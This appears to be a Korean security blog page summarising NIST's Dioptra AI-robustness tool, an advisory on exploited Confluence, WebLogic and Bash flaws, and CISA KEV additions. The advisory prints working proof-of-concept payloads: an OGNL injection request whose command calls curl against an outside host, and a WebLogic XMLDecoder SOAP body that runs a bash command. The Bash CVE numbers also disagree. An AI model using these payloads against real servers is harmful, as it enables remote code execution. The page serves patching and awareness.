요약 - NIST, 머신러닝 모델들의 안전성과 복구력을 확인할 수 있는 오픈소스 도구 Dioptra 배포
- 세 가지 공격(회피, 오염, 오라클)에 대해 방어력을 발휘할 수 있음
내용 - NIST, 머신러닝 모델의 안전성과 복구력을 확인할 수 있는 오픈소스 Dioptra 배포
> 회피, 오염, 오라클 공격을 염두하여 개발
> 이미지 분류에 능한 인공지능 모델을 방어하기 위해 개발됐으나, 음성 인식 등 다른 유형의 인공지능에도 접목 가능

① 회피 (Evasion)
> 인공지능이 엉뚱한 답변을 내놓도록 하는 것이 목표
> 입력 데이터에 노이즈 등을 삽입해 시스템이 응답하는 방식을 변경하는 공격

② 오염 (Poisoning)
> 인공지능 모델의 정확도를 떨어트리는 것을 목표
> 모델의 훈련 데이터를 변경시키고 조작하는 방법으로 목적 달성

③ 오라클(Oracle)
> 인공지능 모델을 리버스 엔지니어링을 통해 훈련 데이터를 추론하고 알아내는 기법

- Dioptra
> 세 가지 공격 중 어떤 것이 어느 정도로까지 영향을 줄 수 있는지 가늠할 수 있음
> 여러 방어 전략이 어느 정도로 효과를 거둘 수 있는지 확인 가능
> 모듈 구성으로 설계되었기 때문에 필요에 따라 다양한 설정으로 실험 가능(모델 변경, 휸련용 데이터셋 교환, 공격 또는 방어 전략 변경 등)
> 사용자 친화적인 웹 UI가 적용되었고, Python 플러그인과 호환이 가능해 여러 조합 구성 가능
기타 - Dioptra와 함께 각종 리스크 관리 전략에 관한 가이드라인 또한 공개
> 특히 인공지능의 선용 가능성과 악용 가능성 모두를 염두에 둔 내용이 담김
> 24.09.09까지 일반 대중들의 의견을 접수 받는 중

 

보안뉴스

 

미국 국립표준기술연구소, 인공지능 안정성 점검 도구를 무료로 배포

미국의 국립표준기술연구소(NIST)가 머신러닝 모델들의 안전성과 복구력을 실험할 수 있게 해 주는 소프트웨어 도구를 개발해 오픈소스로 풀었다. 인공지능을 겨냥한 여러 가지 유형의 공격에

www.boannews.com

 

What is Dioptra? — Dioptra 1.0.0 documentation

Dioptra is a software test platform for assessing the trustworthy characteristics of artificial intelligence (AI). Trustworthy AI is: valid and reliable, safe, secure and resilient, accountable and transparent, explainable and interpretable, privacy-enhanc

pages.nist.gov

 

GitHub - usnistgov/dioptra: Test Software for the Characterization of AI Technologies

Test Software for the Characterization of AI Technologies - GitHub - usnistgov/dioptra: Test Software for the Characterization of AI Technologies

github.com

 

1. 개요 [1]

- 최근 해킹조직이 국내 웹사이트 공격에 소프트웨어 취약점을 악용

- 취약한 버전의 소프트웨어를 운용하는 경우 최신버전 업데이트 등 보안 조치 권고

 

2. 주요내용

2.1 Atlassian (CVE-2023-22527) [2]

- Atlassian社 Confluence Server 및 Confluence Data Center 제품 탬플릿에 OGNL 표현식을 삽입해 원격 코드 실행이 가능한 취약점 (CVSS: 9.8) [3]

- 영향받는 버전: 8.0.x / 8.1.x / 8.2.x / 8.3.x / 8.4.x / 8.5.0 ~ 8.5.3
- 취약점은 "./confluence/confluence/template/aui/text-inline.vm"에서 발생
> #set( $labelValue = $stack.findValue("getText('$parameters.label')") )
> 매개변수를 직접 사용하여 발생하는 취약점

- PoC [4]

POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 255

label=\u0027%2b
#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue((new freemarker.template.utility.Execute()).exec({"curl rce.ee"}),{})%2b\u0027

 

2.2 Oracle (CVE-2017-3506) [5]

- Oracle WebLogic WLS 제품에서 XML 디코드 처리 미흡으로 조작된 XML 페이로드를 전송해 원격 코드 실행이 가능한 취약점 (CVSS: 7.4) [6]
- 영향받는 버전: 10.3.6.0 / 12.1.3.0 / 12.2.1.0 / 12.2.1.1 / 12.2.1.2
- PoC [7][8]

<soapenv:Envelope xmlns:soapenv="hxxp://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="hxxp://bea.com/2004/06/soap/workarea/">
        <java version="1.8.0_131" class="java.beans.XMLDecoder">
          <void class="java.lang.ProcessBuilder">
            <array class="java.lang.String" length="3">
              <void index="0">
                <string>/bin/bash</string>
              </void>
              <void index="1">
                <string>-c</string>
              </void>
              <void index="2">
                <string>touch /tmp/123</string>
              </void>
            </array>
          <void method="start"/></void>
        </java>
      </work:WorkContext>
    </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

 

2.3 GNU (CVE-2013-6217) [9]

- GNU Bash Shell에서 환경변수에 악의적인 코드를 삽입해 원격 코드 실행이 가능한 취약점 (CVSS: 9.8)
- 영향받는 버전: 1.14.0~1.14.7 / 2.0~2.05 / 3.0~3.0.16 / 3.1~3.2.48 / 4.0~ 4.3
- 관련 추가 내용 확인 불가

 

3. 대응방안

- 최신 버전 업데이트 적용

취약점 대상 소프트웨어 조치 방안
CVE-2023-22527 Confluence Data Center 8.5.4. 이상 업데이트
Confluence Server 8.6.0 이상 업데이트
8.7.1 이상 업데이트
CVE-2017-3506 WebLogic 2017.10 Oracle Critical 패치
업데이트
CVE-2014-6271 GNU Bash Red Hat Enterprise Linux 
4,5,6,7 업데이트
Ubuntu 10.04, 12.04, 14.04 
업데이트
* GNU 기반 운영체제별 최신 
업데이트 권고

 

4. 참고

[1] https://www.ncsc.go.kr:4018/main/cop/bbs/selectBoardArticle.do?bbsId=SecurityAdvice_main&nttId=115734&pageIndex=1&searchCnd2=
[2] https://nvd.nist.gov/vuln/detail/CVE-2023-22527
[3] https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/
[4] https://github.com/Manh130902/CVE-2023-22527-POC
[5] https://nvd.nist.gov/vuln/detail/CVE-2017-3506
[6] https://ggonmerr.tistory.com/search/CVE-2017-3506
[7] https://github.com/Al1ex/CVE-2017-3506
[8] http://www.code2sec.com/weblogiclou-dong-cve-2017-3506fu-xian-web-servicesmo-kuai-de-lou-dong.html
[9] https://nvd.nist.gov/vuln/detail/CVE-2013-6217

요약 - CISA, 알려진 익스플로잇 취약점(KEV) 업데이트
- 공격자들이 알려진 취약점 계속 악용하고 있어 즉각적 조치 촉구
내용 - 총 3가지 취약점 업데이트
① 소포스 웹 어플라이언스 취약점 (CVE-2023-1671)
- Sophos 웹 어플라이언스 4.3.10.4 이전 버전의 명령 인젝션 취약점 (CVSS 9.8)
- Sophos는 6개월 전인 4월 4일에 자동 패치가 배포되었다고 강조
> 계획된 업데이트의 일환으로 23년 7월에 Sophos 웹 어플라이언스를 단계적으로 종료할 예정
> 남은 사용자들에게 네트워크 보안을 강화하기 위해 Sophos 방화벽으로 업그레이드할 것을 권장

② 오라클 웹로직 서버 취약점 (CVE-2020-2551):
- 오라클 웹로직 서버 제품의 취약점 (CVSS 9.8)
> 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 및 12.2.1.4.0에 영향을 미침
> 인터넷 인터오브 프로토콜(IIOP)을 통해 네트워크에 액세스할 수 있는 인증되지 않은 공격자의 서버 엑세스가 가능해짐

③ 마이크로소프트 윈도우 웹 마크 오브 더 웹(MOTW) 취약점 (CVE-2023-36584):
- Microsoft Windows의 MOTW 취약점 (CVSS 5.4)
> 취약점으로 인해 보안 기능을 우회할 수 있음
> MOTW 태깅에 의존하는 Microsoft Office의 보호된 보기와 같은 보안 기능의 무결성 및 가용성이 제한적으로 손실될 수 있음
※ MS 설명
> 이 취약점을 악용하기 위해 공격자가 자신이 제어하는 서버에서 파일을 호스팅
> 표적이 된 사용자가 파일을 다운로드하고 열도록 유도할 수 있음
> 이렇게 하면 공격자가 MOTW 기능을 방해할 수 있음

- CISA는 각 공급업체의 지침에 따라 즉시 완화 조치를 적용할 것을 권고
> 완화 조치를 적용할 수 없는 경우 영향 받는 제품의 사용 중단 권장
> 사이버 보안 조치의 우선순위를 정하고 시스템을 최신 상태로 유지할 것을 촉구
> 잠재적인 사이버 위협으로부터 보호하려면 정기적인 모니터링과 사전 예방적 보안 조치가 중요
> 최신 정보를 파악하고 보안 권고에 신속하게 대처하는 것이 무엇보다 중요
기타 - 인터넷 인터오브 프로토콜 (Internet Inter-ORB Protocol, IIOP)
> 다른 프로그래밍 언어로 작성된 분산 프로그램 간의 네트워크 상호 작용을 용이하게하는 데 사용되는 객체 지향 프로토콜

- Mark of the Web (MOTW)
> 인터넷에서 다운로드한 파일이라는 것을 표시해주며, 해당 파일 실행 시 보안 경고 알림이 발생 및 컨텐츠 활성화시 신뢰할 수 있는 문서로 간주되어 매크로 실행이 허용됨

 

보안뉴스

 

[긴급] CISA, 소포스-오라클-마이크로소프트 제품 심각한 보안취약점…주의보 발령 - 데일리시큐

사이버 보안 및 인프라 보안국(CISA)은 최근 권고문을 통해 알려진 익스플로잇 취약점(KEV) 카탈로그에 주요 사이버 보안 및 소프트웨어 대기업인 소포스(Sophos), 오라클(Oracle), 마이크로소프트(Micro

www.dailysecu.com

 

+ Recent posts